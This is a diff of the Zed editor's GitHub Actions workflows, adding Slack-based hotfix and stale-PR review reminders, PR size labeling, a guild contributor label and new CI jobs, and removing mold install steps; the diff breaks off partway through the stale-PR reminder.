if [ "$MATRIX_REPO" = "workflows" ]; then
- cp zed/extensions/workflows/*.yml extension/.github/workflows/
+ cp workflow-files/*.yml extension/.github/workflows/
else
- cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/
+ cp workflow-files/shared/*.yml extension/.github/workflows/
fi
env:
- REMOVED_FILES: ${{ steps.calc-changes.outputs.removed_files }}
+ REMOVED_CI: ${{ needs.fetch_extension_repos.outputs.removed_ci }}
+ REMOVED_SHARED: ${{ needs.fetch_extension_repos.outputs.removed_shared }}
MATRIX_REPO: ${{ matrix.repo }}
- id: short-sha
name: extension_workflow_rollout::rollout_workflows_to_extension::get_short_sha
run: |
- echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT"
- working-directory: zed
+ echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT"
- id: create-pr
name: extension_workflow_rollout::rollout_workflows_to_extension::create_pull_request
uses: peter-evans/create-pull-request@v7
@@ -140,6 +180,8 @@ jobs:
body: |
This PR updates the CI workflow files from the main Zed repository
based on the commit zed-industries/zed@${{ github.sha }}
+
+ ${{ inputs.change-description }}
commit-message: Update CI workflows to `${{ steps.short-sha.outputs.sha_short }}`
branch: update-workflows
committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>
@@ -151,16 +193,17 @@ jobs:
- name: extension_workflow_rollout::rollout_workflows_to_extension::enable_auto_merge
run: |
if [ -n "$PR_NUMBER" ]; then
- cd extension
gh pr merge "$PR_NUMBER" --auto --squash
fi
env:
GH_TOKEN: ${{ steps.generate-token.outputs.token }}
PR_NUMBER: ${{ steps.create-pr.outputs.pull-request-number }}
+ working-directory: extension
timeout-minutes: 10
create_rollout_tag:
needs:
- rollout_workflows_to_extension
+ if: inputs.filter-repos == ''
runs-on: namespace-profile-2x4-ubuntu-2404
steps:
- id: generate-token
@@ -0,0 +1,114 @@
+# Hotfix Review Monitor
+#
+# Runs daily and checks for merged PRs with the 'hotfix' label that have not
+# received a post-merge review approval within one business day. Posts a summary to
+# Slack if any are found. This is a SOC2 compensating control for the
+# emergency hotfix fast path.
+#
+# Security note: No untrusted input (PR titles, bodies, etc.) is interpolated
+# into shell commands. All PR metadata is read via gh API + jq, not via
+# github.event context expressions.
+#
+# Required secrets:
+# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel
+
+name: Hotfix Review Monitor
+
+on:
+ schedule:
+ - cron: "30 13 * * 1-5" # 1:30 PM UTC weekdays
+ workflow_dispatch: {}
+
+permissions:
+ contents: read
+ pull-requests: read
+
+jobs:
+ check-hotfix-reviews:
+ if: github.repository_owner == 'zed-industries'
+ runs-on: ubuntu-latest
+ timeout-minutes: 5
+ env:
+ REPO: ${{ github.repository }}
+ steps:
+ - name: Find unreviewed hotfixes
+ id: check
+ env:
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ run: |
+          # An 80h lookback covers the 72h gap between the Friday and Monday runs, with buffer.
+          # Weekday overlap is harmless — already-reviewed PRs are filtered out below.
+ SINCE=$(date -u -v-80H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \
+ || date -u -d '80 hours ago' +%Y-%m-%dT%H:%M:%SZ)
+ SINCE_DATE=$(echo "$SINCE" | cut -dT -f1)
+
+ # Use the Search API to find hotfix PRs merged in the lookback window.
+ # The Pulls API with state=closed paginates through all closed PRs in
+ # the repo, which times out on large repos. The Search API supports
+ # merged:>DATE natively so GitHub does the filtering server-side.
+ gh api --paginate \
+ "search/issues?q=repo:${REPO}+is:pr+is:merged+label:hotfix+merged:>${SINCE_DATE}&per_page=100" \
+ --jq '[.items[] | {number, title, merged_at: .pull_request.merged_at}]' \
+ > /tmp/hotfix_prs.json
+
+ # Check each hotfix PR for a post-merge approving review
+ jq -r '.[].number' /tmp/hotfix_prs.json | while read -r PR_NUMBER; do
+ APPROVALS=$(gh api \
+ "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \
+ --jq "[.[] | select(.state == \"APPROVED\")] | length")
+
+ if [ "$APPROVALS" -eq 0 ]; then
+ jq ".[] | select(.number == ${PR_NUMBER})" /tmp/hotfix_prs.json
+ fi
+ done | jq -s '.' > /tmp/unreviewed.json
+
+ COUNT=$(jq 'length' /tmp/unreviewed.json)
+ echo "count=$COUNT" >> "$GITHUB_OUTPUT"
+
+ - name: Notify Slack
+ if: steps.check.outputs.count != '0'
+ env:
+ SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }}
+ COUNT: ${{ steps.check.outputs.count }}
+ run: |
+          # Build the Block Kit payload entirely with jq — PR titles are
+          # attacker-controllable, so they must never be interpolated into shell
+          # commands or spliced into JSON by string concatenation. Reading them
+          # with jq -r and re-injecting them via jq --arg keeps the content
+          # JSON-encoded in the final payload; Block Kit changes nothing here —
+          # the same pipeline feeds the blocks structure instead of plain text.
+ PRS=$(jq -r '.[] | "• <https://github.com/'"${REPO}"'/pull/\(.number)|#\(.number)> — \(.title) (merged \(.merged_at | split("T")[0]))"' /tmp/unreviewed.json)
+
+ jq -n \
+ --arg count "$COUNT" \
+ --arg prs "$PRS" \
+ '{
+ text: ($count + " hotfix PR(s) still need post-merge review"),
+ blocks: [
+ {
+ type: "section",
+ text: {
+ type: "mrkdwn",
+ text: (":rotating_light: *" + $count + " Hotfix PR(s) Need Post-Merge Review*")
+ }
+ },
+ {
+ type: "section",
+ text: { type: "mrkdwn", text: $prs }
+ },
+ { type: "divider" },
+ {
+ type: "context",
+ elements: [{
+ type: "mrkdwn",
+ text: "Hotfix PRs require review within one business day of merge."
+ }]
+ }
+ ]
+ }' | \
+ curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \
+ -H 'Content-Type: application/json' \
+ -d @-
+defaults:
+ run:
+ shell: bash -euxo pipefail {0}
@@ -0,0 +1,109 @@
+# PR Size Check — Compute
+#
+# Calculates PR size and saves the result as an artifact. A companion
+# workflow (pr-size-label.yml) picks up the artifact via workflow_run
+# and applies labels + comments with write permissions.
+#
+# This two-workflow split is required because fork PRs receive a
+# read-only GITHUB_TOKEN. The compute step needs no write access;
+# the label/comment step runs via workflow_run on the base repo with
+# full write permissions.
+#
+# Security note: This workflow only reads PR file data via the JS API
+# and writes a JSON artifact. No untrusted input is interpolated into
+# shell commands.
+
+name: PR Size Check
+
+on:
+ pull_request:
+ types: [opened, synchronize]
+
+permissions:
+ contents: read
+ pull-requests: read
+
+jobs:
+ compute-size:
+ if: github.repository_owner == 'zed-industries'
+ runs-on: ubuntu-latest
+ timeout-minutes: 5
+ steps:
+ - name: Calculate PR size
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ with:
+ script: |
+ const fs = require('fs');
+
+ const { data: files } = await github.rest.pulls.listFiles({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: context.issue.number,
+ per_page: 300,
+ });
+
+ // Sum additions + deletions, excluding generated/lock files
+ const IGNORED_PATTERNS = [
+ /\.lock$/,
+ /^Cargo\.lock$/,
+ /pnpm-lock\.yaml$/,
+ /\.generated\./,
+ /\/fixtures\//,
+ /\/snapshots\//,
+ ];
+
+ let totalChanges = 0;
+ for (const file of files) {
+ const ignored = IGNORED_PATTERNS.some(p => p.test(file.filename));
+ if (!ignored) {
+ totalChanges += file.additions + file.deletions;
+ }
+ }
+
+ // Assign size bracket
+ const SIZE_BRACKETS = [
+ ['Size S', 0, 100, '0e8a16'],
+ ['Size M', 100, 400, 'fbca04'],
+ ['Size L', 400, 800, 'e99695'],
+ ['Size XL', 800, Infinity, 'b60205'],
+ ];
+
+ let sizeLabel = 'Size S';
+ let labelColor = '0e8a16';
+ for (const [label, min, max, color] of SIZE_BRACKETS) {
+ if (totalChanges >= min && totalChanges < max) {
+ sizeLabel = label;
+ labelColor = color;
+ break;
+ }
+ }
+
+ // Check if the author wrote content in the "How to Review" section.
+ const rawBody = context.payload.pull_request.body || '';
+ const howToReview = rawBody.match(/## How to Review\s*\n([\s\S]*?)(?=\n## |$)/i);
+ const hasReviewGuidance = howToReview
+ ? howToReview[1].replace(/<!--[\s\S]*?-->/g, '').trim().length > 0
+ : false;
+
+ const result = {
+ pr_number: context.issue.number,
+ total_changes: totalChanges,
+ size_label: sizeLabel,
+ label_color: labelColor,
+ has_review_guidance: hasReviewGuidance,
+ };
+
+ console.log(`PR #${result.pr_number}: ${totalChanges} LOC, ${sizeLabel}`);
+
+ fs.mkdirSync('pr-size', { recursive: true });
+ fs.writeFileSync('pr-size/result.json', JSON.stringify(result));
+
+ - name: Upload size result
+ uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
+ with:
+ name: pr-size-result
+ path: pr-size/
+ retention-days: 1
+defaults:
+ run:
+ shell: bash -euxo pipefail {0}
@@ -0,0 +1,195 @@
+# PR Size Check — Label & Comment
+#
+# Triggered by workflow_run after pr-size-check.yml completes.
+# Downloads the size result artifact and applies labels + comments.
+#
+# This runs on the base repo with full GITHUB_TOKEN write access,
+# so it works for both same-repo and fork PRs.
+#
+# Security note: The artifact is treated as untrusted data — only
+# structured JSON fields (PR number, size label, color, boolean) are
+# read. No artifact content is executed or interpolated into shell.
+
+name: PR Size Label
+
+on:
+ workflow_run:
+ workflows: ["PR Size Check"]
+ types: [completed]
+
+jobs:
+ apply-labels:
+ if: >
+ github.repository_owner == 'zed-industries' &&
+ github.event.workflow_run.conclusion == 'success'
+ permissions:
+ contents: read
+ pull-requests: write
+ issues: write
+ runs-on: ubuntu-latest
+ timeout-minutes: 5
+ steps:
+ - name: Download size result artifact
+ id: download
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ with:
+ script: |
+ const fs = require('fs');
+ const path = require('path');
+
+ const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+
+ const match = allArtifacts.data.artifacts.find(a => a.name === 'pr-size-result');
+ if (!match) {
+ console.log('No pr-size-result artifact found, skipping');
+ core.setOutput('found', 'false');
+ return;
+ }
+
+ const download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: match.id,
+ archive_format: 'zip',
+ });
+
+ const temp = path.join(process.env.RUNNER_TEMP, 'pr-size');
+ fs.mkdirSync(temp, { recursive: true });
+ fs.writeFileSync(path.join(temp, 'result.zip'), Buffer.from(download.data));
+ core.setOutput('found', 'true');
+
+ - name: Unzip artifact
+ if: steps.download.outputs.found == 'true'
+ env:
+ ARTIFACT_DIR: ${{ runner.temp }}/pr-size
+ run: unzip "$ARTIFACT_DIR/result.zip" -d "$ARTIFACT_DIR"
+
+ - name: Apply labels and comment
+ if: steps.download.outputs.found == 'true'
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ with:
+ script: |
+ const fs = require('fs');
+ const path = require('path');
+
+ const temp = path.join(process.env.RUNNER_TEMP, 'pr-size');
+ const resultPath = path.join(temp, 'result.json');
+ if (!fs.existsSync(resultPath)) {
+ console.log('No result.json found, skipping');
+ return;
+ }
+
+ const result = JSON.parse(fs.readFileSync(resultPath, 'utf8'));
+
+ // Validate artifact data (treat as untrusted)
+ const prNumber = Number(result.pr_number);
+ const totalChanges = Number(result.total_changes);
+ const sizeLabel = String(result.size_label);
+ const labelColor = String(result.label_color);
+ const hasReviewGuidance = Boolean(result.has_review_guidance);
+
+ if (!prNumber || !sizeLabel.startsWith('Size ')) {
+ core.setFailed(`Invalid artifact data: pr=${prNumber}, label=${sizeLabel}`);
+ return;
+ }
+
+ console.log(`PR #${prNumber}: ${totalChanges} LOC, ${sizeLabel}`);
+
+ // --- Size label (idempotent) ---
+ const existingLabels = (await github.rest.issues.listLabelsOnIssue({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ })).data.map(l => l.name);
+
+ const existingSizeLabels = existingLabels.filter(l => l.startsWith('Size '));
+ const alreadyCorrect = existingSizeLabels.length === 1 && existingSizeLabels[0] === sizeLabel;
+
+ if (!alreadyCorrect) {
+ for (const label of existingSizeLabels) {
+ await github.rest.issues.removeLabel({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ name: label,
+ });
+ }
+
+ try {
+ await github.rest.issues.createLabel({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ name: sizeLabel,
+ color: labelColor,
+ });
+ } catch (e) {
+ if (e.status !== 422) throw e;
+ }
+
+ await github.rest.issues.addLabels({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ labels: [sizeLabel],
+ });
+ }
+
+ // --- Large PR handling (400+ LOC) ---
+ if (totalChanges >= 400) {
+ if (!existingLabels.includes('large-pr')) {
+ try {
+ await github.rest.issues.createLabel({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ name: 'large-pr',
+ color: 'e99695',
+ });
+ } catch (e) {
+ if (e.status !== 422) throw e;
+ }
+
+ await github.rest.issues.addLabels({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ labels: ['large-pr'],
+ });
+ }
+
+ // Comment once with guidance
+ const MARKER = '<!-- pr-size-check -->';
+ const { data: comments } = await github.rest.issues.listComments({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ });
+
+ const alreadyCommented = comments.some(c => c.body.includes(MARKER));
+ if (!alreadyCommented) {
+ let body = `${MARKER}\n`;
+ body += `### :straight_ruler: PR Size: **${totalChanges} lines changed** (${sizeLabel})\n\n`;
+ body += `Please note: this PR exceeds the 400 LOC soft limit.\n`;
+ body += `- Consider **splitting** into separate PRs if the changes are separable\n`;
+ body += `- Ensure the PR description includes a **guided tour** in the "How to Review" section so reviewers know where to start\n`;
+
+ if (hasReviewGuidance) {
+ body += `\n:white_check_mark: "How to Review" section appears to include guidance — thank you!\n`;
+ }
+
+ await github.rest.issues.createComment({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ body: body,
+ });
+ }
+ }
+
+ console.log(`PR #${prNumber}: labeled ${sizeLabel}, done`);
+defaults:
+ run:
+ shell: bash -euxo pipefail {0}
@@ -1,5 +1,6 @@
# Labels pull requests by author: 'bot' for bot accounts, 'staff' for
-# staff team members, 'first contribution' for first-time external contributors.
+# staff team members, 'guild' for guild members, 'first contribution' for
+# first-time external contributors.
name: PR Labeler
on:
@@ -29,8 +30,50 @@ jobs:
script: |
const BOT_LABEL = 'bot';
const STAFF_LABEL = 'staff';
+ const GUILD_LABEL = 'guild';
const FIRST_CONTRIBUTION_LABEL = 'first contribution';
const STAFF_TEAM_SLUG = 'staff';
+ const GUILD_MEMBERS = [
+ '11happy',
+ 'AidanV',
+ 'AmaanBilwar',
+ 'OmChillure',
+ 'Palanikannan1437',
+ 'Shivansh-25',
+ 'SkandaBhat',
+ 'TwistingTwists',
+ 'YEDASAVG',
+ 'Ziqi-Yang',
+ 'alanpjohn',
+ 'arjunkomath',
+ 'austincummings',
+ 'ayushk-1801',
+ 'claiwe',
+ 'criticic',
+ 'dongdong867',
+ 'emamulandalib',
+ 'eureka928',
+ 'feitreim',
+ 'iam-liam',
+ 'iksuddle',
+ 'ishaksebsib',
+ 'lingyaochu',
+ 'loadingalias',
+ 'marcocondrache',
+ 'mchisolm0',
+ 'mostlyKIGuess',
+ 'nairadithya',
+ 'nihalxkumar',
+ 'notJoon',
+ 'polyesterswing',
+ 'prayanshchh',
+ 'razeghi71',
+ 'sarmadgulzar',
+ 'seanstrom',
+ 'th0jensen',
+ 'tommyming',
+ 'virajbhartiya',
+ ];
const pr = context.payload.pull_request;
const author = pr.user.login;
@@ -71,6 +114,17 @@ jobs:
return;
}
+ if (GUILD_MEMBERS.includes(author)) {
+ await github.rest.issues.addLabels({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: pr.number,
+ labels: [GUILD_LABEL]
+ });
+ console.log(`PR #${pr.number} by ${author}: labeled '${GUILD_LABEL}' (guild member)`);
+ // No early return: guild members can also get 'first contribution'
+ }
+
// We use inverted logic here due to a suspected GitHub bug where first-time contributors
// get 'NONE' instead of 'FIRST_TIME_CONTRIBUTOR' or 'FIRST_TIMER'.
// https://github.com/orgs/community/discussions/78038
@@ -72,8 +72,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_node
@@ -199,8 +197,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_sccache
@@ -318,8 +314,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -360,8 +354,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -122,8 +122,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -170,8 +168,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -34,8 +34,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_cargo_config
@@ -32,8 +32,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -73,8 +71,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -35,8 +35,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::cargo_install_nextest
@@ -103,13 +103,22 @@ jobs:
check_pattern "run_action_checks" '^\.github/(workflows/|actions/|actionlint.yml)|tooling/xtask|script/' -qP
check_pattern "run_docs" '^(docs/|crates/.*\.rs)' -qP
check_pattern "run_licenses" '^(Cargo.lock|script/.*licenses)' -qP
- check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))' -qvP
+ check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)' -qvP
+ # Detect changed extension directories (excluding extensions/workflows)
+ CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true)
+ if [ -n "$CHANGED_EXTENSIONS" ]; then
+ EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))')
+ else
+ EXTENSIONS_JSON="[]"
+ fi
+ echo "changed_extensions=$EXTENSIONS_JSON" >> "$GITHUB_OUTPUT"
outputs:
changed_packages: ${{ steps.filter.outputs.changed_packages }}
run_action_checks: ${{ steps.filter.outputs.run_action_checks }}
run_docs: ${{ steps.filter.outputs.run_docs }}
run_licenses: ${{ steps.filter.outputs.run_licenses }}
run_tests: ${{ steps.filter.outputs.run_tests }}
+ changed_extensions: ${{ steps.filter.outputs.changed_extensions }}
check_style:
if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions')
runs-on: namespace-profile-4x8-ubuntu-2204
@@ -147,8 +156,8 @@ jobs:
file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz
- name: run_tests::run_ts_query_ls
run: |-
- tar -xf ts_query_ls-x86_64-unknown-linux-gnu.tar.gz
- ./ts_query_ls format --check . || {
+ tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE"
+ "$GITHUB_WORKSPACE/ts_query_ls" format --check . || {
echo "Found unformatted queries, please format them with ts_query_ls."
echo "For easy use, install the Tree-sitter query extension:"
echo "zed://extension/tree-sitter-query"
@@ -209,8 +218,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_sccache
@@ -256,6 +263,39 @@ jobs:
- name: steps::show_sccache_stats
run: sccache --show-stats || true
timeout-minutes: 60
+ clippy_mac_x86_64:
+ needs:
+ - orchestrate
+ if: needs.orchestrate.outputs.run_tests == 'true'
+ runs-on: namespace-profile-mac-large
+ steps:
+ - name: steps::checkout_repo
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ clean: false
+ - name: steps::setup_cargo_config
+ run: |
+ mkdir -p ./../.cargo
+ cp ./.cargo/ci-config.toml ./../.cargo/config.toml
+ - name: steps::cache_rust_dependencies_namespace
+ uses: namespacelabs/nscloud-cache-action@v1
+ with:
+ cache: rust
+ path: ~/.rustup
+ - name: steps::install_rustup_target
+ run: rustup target add x86_64-apple-darwin
+ - name: steps::setup_sccache
+ run: ./script/setup-sccache
+ env:
+ R2_ACCOUNT_ID: ${{ secrets.R2_ACCOUNT_ID }}
+ R2_ACCESS_KEY_ID: ${{ secrets.R2_ACCESS_KEY_ID }}
+ R2_SECRET_ACCESS_KEY: ${{ secrets.R2_SECRET_ACCESS_KEY }}
+ SCCACHE_BUCKET: sccache-zed
+ - name: steps::clippy
+ run: ./script/clippy --target x86_64-apple-darwin
+ - name: steps::show_sccache_stats
+ run: sccache --show-stats || true
+ timeout-minutes: 60
run_tests_windows:
needs:
- orchestrate
@@ -322,8 +362,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_node
@@ -421,8 +459,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_cargo_config
@@ -471,8 +507,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_sccache
@@ -597,8 +631,6 @@ jobs:
jobSummary: false
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/generate-action-metadata
@@ -711,6 +743,20 @@ jobs:
- name: run_tests::check_postgres_and_protobuf_migrations::check_protobuf_formatting
run: buf format --diff --exit-code crates/proto/proto
timeout-minutes: 60
+ extension_tests:
+ needs:
+ - orchestrate
+ if: needs.orchestrate.outputs.changed_extensions != '[]'
+ permissions:
+ contents: read
+ strategy:
+ matrix:
+ extension: ${{ fromJson(needs.orchestrate.outputs.changed_extensions) }}
+ fail-fast: false
+ max-parallel: 1
+ uses: ./.github/workflows/extension_tests.yml
+ with:
+ working-directory: ${{ matrix.extension }}
tests_pass:
needs:
- orchestrate
@@ -718,6 +764,7 @@ jobs:
- clippy_windows
- clippy_linux
- clippy_mac
+ - clippy_mac_x86_64
- run_tests_windows
- run_tests_linux
- run_tests_mac
@@ -728,6 +775,7 @@ jobs:
- check_docs
- check_licenses
- check_scripts
+ - extension_tests
if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && always()
runs-on: namespace-profile-2x4-ubuntu-2404
steps:
@@ -746,6 +794,7 @@ jobs:
check_result "clippy_windows" "$RESULT_CLIPPY_WINDOWS"
check_result "clippy_linux" "$RESULT_CLIPPY_LINUX"
check_result "clippy_mac" "$RESULT_CLIPPY_MAC"
+ check_result "clippy_mac_x86_64" "$RESULT_CLIPPY_MAC_X86_64"
check_result "run_tests_windows" "$RESULT_RUN_TESTS_WINDOWS"
check_result "run_tests_linux" "$RESULT_RUN_TESTS_LINUX"
check_result "run_tests_mac" "$RESULT_RUN_TESTS_MAC"
@@ -756,6 +805,7 @@ jobs:
check_result "check_docs" "$RESULT_CHECK_DOCS"
check_result "check_licenses" "$RESULT_CHECK_LICENSES"
check_result "check_scripts" "$RESULT_CHECK_SCRIPTS"
+ check_result "extension_tests" "$RESULT_EXTENSION_TESTS"
exit $EXIT_CODE
env:
@@ -764,6 +814,7 @@ jobs:
RESULT_CLIPPY_WINDOWS: ${{ needs.clippy_windows.result }}
RESULT_CLIPPY_LINUX: ${{ needs.clippy_linux.result }}
RESULT_CLIPPY_MAC: ${{ needs.clippy_mac.result }}
+ RESULT_CLIPPY_MAC_X86_64: ${{ needs.clippy_mac_x86_64.result }}
RESULT_RUN_TESTS_WINDOWS: ${{ needs.run_tests_windows.result }}
RESULT_RUN_TESTS_LINUX: ${{ needs.run_tests_linux.result }}
RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }}
@@ -774,6 +825,7 @@ jobs:
RESULT_CHECK_DOCS: ${{ needs.check_docs.result }}
RESULT_CHECK_LICENSES: ${{ needs.check_licenses.result }}
RESULT_CHECK_SCRIPTS: ${{ needs.check_scripts.result }}
+ RESULT_EXTENSION_TESTS: ${{ needs.extension_tests.result }}
concurrency:
group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}
cancel-in-progress: true
@@ -38,8 +38,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::cargo_install_nextest
@@ -0,0 +1,115 @@
+# Stale PR Review Reminder
+#
+# Runs daily on weekdays and posts a Slack summary of open PRs that have been
+# awaiting review for more than 72 hours. (A second run at 8 PM UTC exists but
+# is disabled during the initial rollout.) Team-level signal only — no individual shaming.
+#
+# Security note: No untrusted input is interpolated into shell commands.
+# All PR metadata is read via gh API + jq.
+#
+# Required secrets:
+# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel
+
+name: Stale PR Review Reminder
+
+on:
+ schedule:
+ - cron: "0 14 * * 1-5" # 2 PM UTC weekdays
+ # - cron: "0 20 * * 1-5" # 8 PM UTC weekdays — enable after initial rollout
+ workflow_dispatch: {}
+
+permissions:
+ contents: read
+ pull-requests: read
+
+jobs:
+ check-stale-prs:
+ if: github.repository_owner == 'zed-industries'
+ runs-on: ubuntu-latest
+ timeout-minutes: 5
+ env:
+ REPO: ${{ github.repository }}
+ # Only surface PRs created on or after this date. Update this if the
+ # review process enforcement date changes.
+ PROCESS_START_DATE: "2026-03-19T00:00:00Z"
+ steps:
+ - name: Find PRs awaiting review longer than 72h
+ id: stale
+ env:
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ run: |
+ CUTOFF=$(date -u -v-72H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \
+ || date -u -d '72 hours ago' +%Y-%m-%dT%H:%M:%SZ)
+
+ # Get open, non-draft PRs with pending review requests, created before cutoff
+ # but after the review process start date (to exclude pre-existing backlog)
+ gh api --paginate \
+ "repos/${REPO}/pulls?state=open&sort=updated&direction=asc&per_page=100" \
+ --jq "[
+ .[] |
+ select(.draft == false) |
+ select(.created_at > \"$PROCESS_START_DATE\") |
+ select(.created_at < \"$CUTOFF\") |
+ select((.requested_reviewers | length > 0) or (.requested_teams | length > 0))
+ ]" > /tmp/candidates.json
+
+ # Filter to PRs with zero approving reviews
+ jq -r '.[].number' /tmp/candidates.json | while read -r PR_NUMBER; do
+ APPROVALS=$(gh api \
+ "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \
+ --jq "[.[] | select(.state == \"APPROVED\")] | length" 2>/dev/null || echo "0")
+
+ if [ "$APPROVALS" -eq 0 ]; then
+ jq ".[] | select(.number == ${PR_NUMBER}) | {number, title, author: .user.login, created_at}" \
+ /tmp/candidates.json
+ fi
+ done | jq -s '.' > /tmp/awaiting.json
+
+ COUNT=$(jq 'length' /tmp/awaiting.json)
+ echo "count=$COUNT" >> "$GITHUB_OUTPUT"
+
+ - name: Notify Slack
+ if: steps.stale.outputs.count != '0'
+ env:
+ SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }}
+ COUNT: ${{ steps.stale.outputs.count }}
+ run: |
